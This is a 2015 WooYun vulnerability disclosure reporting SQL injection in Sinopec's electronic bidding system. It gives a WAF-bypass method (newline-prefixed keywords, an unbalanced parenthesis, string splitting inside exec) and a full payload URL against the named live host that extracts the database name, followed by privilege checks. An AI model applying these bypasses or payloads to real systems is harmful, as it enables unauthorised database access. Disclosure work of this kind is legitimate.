漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0157672
漏洞标题:中石化某系统存在系统权限报错注入漏洞(绕过WAF注入)
相关厂商:中国石油化工股份有限公司
漏洞作者: 路人甲
提交时间:2015-12-02 17:55
修复时间:2015-12-07 17:56
公开时间:2015-12-07 17:56
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-02: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中石化某系统存在DBA权限注入漏洞(绕过WAF注入)
详细说明:
中石化电子招标系统存在注入漏洞
该系统用来发布招标公告、通知、中标候选人公示、中标结果公告等重要信息。
该系统有WAF,但是规则过滤不严格 可以突破规则进行注入
参数keyword过滤不严格,其中过滤了() select from等等关键字
绕过方法:
对于select等关键字可以在其前面加%0a绕过
对于() 应该是正则匹配成对括号然后过滤,可以多构造一个( ,绕过比如
(';exec('select%0acount(*)%0af'%2b'rom%0alabeng%0awhere%0alala>1')--
对于其他关键字的绕过 直接在exec里面 用字符拼接绕过,比如这里的from :
exec('select%0acount(*)%0af'%2b'rom%0alabeng%0awhere%0alala>1')
漏洞证明:
报数据库名
http://eb.sinopec.com//TPWeb/Showinfo/SearchResult.aspx?keyword=%28%27;exec%28%27select%0A1%0Awhere%0A1=%28select%0Aname%0Afr%27%2b%27om%0Amas%27%2b%27ter.d%27%2b%27bo.sysd%27%2b%27atabases+where+dbid=1%29%27%29--&searchtype=1
user_name:
判断是否为系统权限:
返回空白表示条件为假,有信息返回表示为系统权限
判断是否有数据库管理权限
返回真
修复方案:
完善WAF过滤规则
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-12-07 17:56
厂商回复:
漏洞Rank:15 (WooYun评价)
最新状态:
暂无